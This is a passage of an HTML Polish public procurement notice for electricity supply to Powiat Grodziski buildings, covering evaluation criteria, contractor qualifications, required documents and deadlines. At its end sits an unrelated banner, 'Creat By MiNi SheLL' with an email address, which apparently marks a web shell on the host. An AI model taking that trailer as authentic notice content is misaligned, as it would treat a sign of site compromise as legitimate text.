<br/>10)	Nr PPE: PL_ZEWD_1405000316_09, nr licznika: 2918495<br/><br/><br/>Dostawcą energii dla obiektów objętych niniejszym postępowaniem do dnia 31.01.2022 r. była firma One S.A. ul. Adama Naruszewicza 27 lok. 2 02-627 Warszawa. Od dnia 01.02.2022 r. w energię elektryczną obiekty Powiatu Grodziskiego zaopatruje dostawca rezerwowy - PGE Obrót S.A.<br/>Powiat Grodziski dysponuje tytułem prawnym, który upoważnia go do swobodnego dysponowania obiektami opisanymi w przedmiocie zamówienia.<br/>Zamawiający informuje, że udzieli Wykonawcy stosownego pełnomocnictwa do zgłoszenia w imieniu Zamawiającego zawartej umowy sprzedaży energii elektrycznej do OSD oraz wykonania czynności niezbędnych do przeprowadzenia procesu zmiany sprzedawcy u OSD według wzoru stosowanego powszechnie przez Wykonawcę.<br/>Zamawiający posiada podpisane umowy na czas nieokreślony na dystrybucję energii elektrycznej do wyżej wymienionych posesji z firmą: PGE Dystrybucja S.A. Oddział Warszawa ul. Marsa 95, kod 04-470 Warszawa.<br/>Rozliczenie dostawy odbywać się będzie na podstawie faktycznego zużycia energii według cen i stawek sprzedawcy energii. Na każdy z obiektów wystawiona będzie niezależna faktura bądź osobne rozliczenie dla każdego z budynków na jednej fakturze. Podane wartości zużycia energii są orientacyjne i służą jedynie do porównania cen złożonych ofert. Rzeczywiste wartości mogą być inne.<br/>Zamawiający nie wyraża zgody na udostępnianie Zamawiającemu faktur VAT za pośrednictwem kanałów elektronicznych na podany adres poczty elektronicznej, zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług (Dz.U. 2020 poz. 106 z późn. zm.) przy jednoczesnej zgodzie na otrzymywanie informacji o tych fakturach. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09000000-3 - Produkty naftowe, paliwo, energia elektryczna i inne źródła energii</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09300000-2 - Energia elektryczna, cieplna, słoneczna i jądrowa</p> <p class="mb-0">09310000-5 - Elektryczność</p> <p class="mb-0">65300000-6 - Przesył energii elektrycznej i podobne usługi</p> <p class="mb-0">65310000-9 - Przesył energii elektrycznej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">do 10%</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">XX.	Opis kryteriów oceny ofert wraz z podaniem wag tych kryteriów i sposobu oceny ofert. <br/>1.	Kryterium „Cena” w zł:<br/>1) znaczenie kryterium - 60% (0,6);<br/>2) opis sposobu oceny ofert dla kryterium „Ceny”: <br/>Lcena = (Cmin / C) x 0,6 x 100 pkt<br/>gdzie:<br/>a)	Lcena - liczba uzyskanych punktów dla kryterium „Cena” ocenianej oferty;<br/>b)	Cmin - cena w ofercie z najniższą ceną;<br/>c)	C - cena w ofercie ocenianej.<br/>2.	Kryterium „Termin płatności” w dniach:<br/>1)	znaczenie kryterium - 40% (0,4);<br/>2)	opis sposobu oceny ofert dla kryterium „Termin płatności”: <br/>T- Termin płatności. (Minimalnie 14 dni, maksymalnie 30 dni). Do wyliczenia terminu Zamawiający przyjmie „Termin płatności” wskazany przez Wykonawcę w Formularzu ofertowym (Załącznik nr 1 do SWZ).<br/>Przyznane pkt T=	Termin płatności z badanej oferty x 40 pkt<br/>	najdłuższy termin płatności wskazany w złożonych ofertach<br/><br/><br/> Liczba punktów określona zostanie na podstawie poniższego wzoru:<br/><br/> C+T<br/><br/>W przypadku wskazania terminu płatności dłuższego niż 30 dni oferta Wykonawcy zostanie odrzucona. W przypadku wartości z przecinkami ( np. 20,5 dnia) wartość zostanie zaokrąglana w dół do pełnego dnia. W przypadku podania terminu w innych jednostkach (np. godziny) oferta Wykonawcy zostanie odrzucona. W przypadku wskazania terminu płatności niższego niż 14 dni oferta Wykonawcy zostanie odrzucona.<br/><br/><br/>3.	Za najkorzystniejszą zostanie uznana oferta, która uzyska największą liczbę punktów ze wszystkich kryteriów. Uzyskana liczba punktów w ramach kryterium zaokrąglona będzie do drugiego miejsca po przecinku. Jeżeli trzecia cyfra po przecinku (i/lub następne) jest mniejsza od 5 wynik zostanie zaokrąglony w dół, a jeżeli cyfra jest równa lub większa od 5 wynik zostanie zaokrąglony w górę.<br/>4.	Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze. <br/>5.	Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybiera ofertę z najniższą ceną lub najniższym kosztem.<br/>6.	Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w ust. 5, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę lub koszt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki udziału w postępowaniu dotyczące:<br/>1.	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.<br/>2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Wykonawca spełni warunek dotyczący kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej jeżeli wykaże, że posiada aktualną (ważną) koncesję w zakresie obrotu energią elektryczną wydaną przez Prezesa Urzędu Regulacji Energetyki lub w przypadku gdy Wykonawca nie jest właścicielem sieci na obszarze na którym znajduje się miejsce dostaw energii elektrycznej – oświadczenie o zawarciu umowy z Operatorem Systemu Dystrybucyjnego.<br/>3.	sytuacji ekonomicznej lub finansowej: <br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.<br/>4.	zdolności technicznej lub zawodowej:<br/> Dla I części postępowania warunek zostanie spełniony, jeżeli Wykonawca wykaże, że:<br/>- nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał należycie (a w przypadku świadczeń okresowych lub ciągłych również wykonuje) minimum jedna dostawa energii elektrycznej o wartości nie mniejszej niż 30.000,00 zł brutto. W przypadku wykonywania i nie zakończenia jeszcze dostawy, Wykonawca zobowiązany jest podać na jaką wartość do momentu upływu terminu składania ofert, umowa została wykonana. Wartość będzie brana pod uwagę do oceny spełnienia warunku,<br/> Dla II części postępowania warunek zostanie spełniony, jeżeli Wykonawca wykaże, że:<br/>- nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał należycie (a w przypadku świadczeń okresowych lub ciągłych również wykonuje) minimum dwie dostawy energii elektrycznej o wartości nie mniejszej niż 65.000,00 zł brutto. W przypadku wykonywania i nie zakończenia jeszcze dostawy, Wykonawca zobowiązany jest podać na jaką wartość do momentu upływu terminu składania ofert, umowa została wykonana. Wartość będzie brana pod uwagę do oceny spełnienia warunku. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego, zamawiający żąda następujących podmiotowych środków dowodowych:<br/>1)	oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej; <br/>2.	Wykonawca nie podlega wykluczeniu w okolicznościach określonych w art. 108 ust. 1 pkt 1, 2 i 5 Pzp, jeżeli udowodni zamawiającemu, że spełnił łącznie następujące przesłanki:<br/>1)	naprawił lub zobowiązał się do naprawienia szkody wyrządzonej przestępstwem, wykroczeniem lub swoim nieprawidłowym postępowaniem, w tym poprzez zadośćuczynienie pieniężne; <br/>2)	wyczerpująco wyjaśnił fakty i okoliczności związane z przestępstwem, wykroczeniem lub swoim nieprawidłowym postępowaniem oraz spowodowanymi przez nie szkodami, aktywnie współpracując odpowiednio z właściwymi organami, w tym organami ścigania, lub zamawiającym;<br/>3)	podjął konkretne środki techniczne, organizacyjne i kadrowe, odpowiednie dla zapobiegania dalszym przestępstwom, wykroczeniom lub nieprawidłowemu postępowaniu, w szczególności: <br/>a) zerwał wszelkie powiązania z osobami lub podmiotami odpowiedzialnymi za nieprawidłowe postępowanie wykonawcy, <br/>	b) zreorganizował personel, <br/>	c) wdrożył system sprawozdawczości i kontroli, <br/>	d) utworzył struktury audytu wewnętrznego do monitorowania przestrzegania przepisów, wewnętrznych regulacji lub standardów, <br/>	e) wprowadził wewnętrzne regulacje dotyczące odpowiedzialności i odszkodowań za nieprzestrzeganie przepisów, wewnętrznych regulacji lub standardów. <br/>3.	Zamawiający ocenia, czy podjęte przez wykonawcę czynności, o których mowa w ust. 2, są wystarczające do wykazania jego rzetelności, uwzględniając wagę i szczególne okoliczności czynu wykonawcy. Jeżeli podjęte przez wykonawcę czynności, o których mowa w ust. 2, nie są wystarczające do wykazania jego rzetelności, zamawiający wyklucza wykonawcę.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z Załącznikiem nr 2a i 2b do SWZ oraz braku podstaw do wykluczenia z postępowania – zgodnie z Załącznikiem nr 3a i 3b do SWZ.<br/>2.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców (dotyczy również wspólników spółki cywilnej) oświadczenia, o których mowa w pkt 1 powyżej składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <br/>3.	Informacje zawarte w oświadczeniach, o których mowa w pkt 1 powyżej stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>4.	Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień złożenia.<br/>5.	W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących zdolności zawodowej zamawiający żąda podmiotowego środka dowodowego tj.:<br/>1)	wykazu dostaw wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy; wzór wykazu stanowi Załącznik nr 6a i 6b do SWZ;<br/><br/>6.	W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących wymaganych uprawnień do prowadzenia określonej działalności gospodarczej, zamawiający żąda podmiotowego środka dowodowego tj.:<br/>1) kopia aktualnej (ważnej) koncesji w zakresie obrotu energią elektryczną wydanej przez Prezesa Urzędu Regulacji Energetyki lub w przypadku gdy Wykonawca nie jest właścicielem sieci na obszarze na którym znajduje się miejsce dostaw energii elektrycznej – oświadczenie o zawarciu umowy z Operatorem Systemu Dystrybucyjnego.<br/>7.	Okres wyrażony w latach, o którym mowa w pkt 5 ppkt 1) powyżej , liczy się wstecz od dnia, w którym upływa termin składania ofert.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W niniejszym postępowaniu Zamawiający nie żąda złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> NA OFERTĘ SKŁADA SIĘ:<br/>1)	Formularz ofertowy przygotowany według wzoru Załącznika nr 1b i 1a do SWZ oraz formularz cenowy 1a i 1b;<br/>2)	Oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z Załącznikiem nr 2a i 2b do SWZ oraz oświadczenie o braku podstaw do wykluczenia zgodnie z Załącznikiem nr 3a i 3b do SWZ;<br/>3)	Zobowiązanie podmiotu trzeciego do oddania swego zasobu na potrzeby Wykonawcy składającego ofertę – jeżeli dotyczy;<br/>4)	Pełnomocnictwo/Pełnomocnictwa dla osoby/osób podpisujących ofertę, jeżeli oferta jest podpisana przez pełnomocnika – jeżeli dotyczy. W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia -pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowę o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy.<br/>5)	Oświadczenia i/lub dokumenty na podstawie których, Zamawiający dokona oceny skuteczności zastrzeżenia informacji zawartych w ofercie, stanowiących tajemnicę przedsiębiorstwa, w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji (jeżeli Wykonawca zastrzega takie informacje). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych.<br/>2.	Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>3.	Zamawiający żąda od wykonawcy, który polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby na zasadach określonych w art. 118 Pzp, przedstawienia podmiotowych środków dowodowych, o których mowa w rozdziale XI SWZ (z wyłączeniem oświadczenia o którym mowa w rozdziale IX ust. 1 pkt 1 SWZ), dotyczących tych podmiotów, potwierdzających, że nie zachodzą wobec tych podmiotów podstawy wykluczenia z postępowania <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> zgodnie z przepisami Pzp i dostawcy energii <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-16 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://powiat-grodziski.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-16 12:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com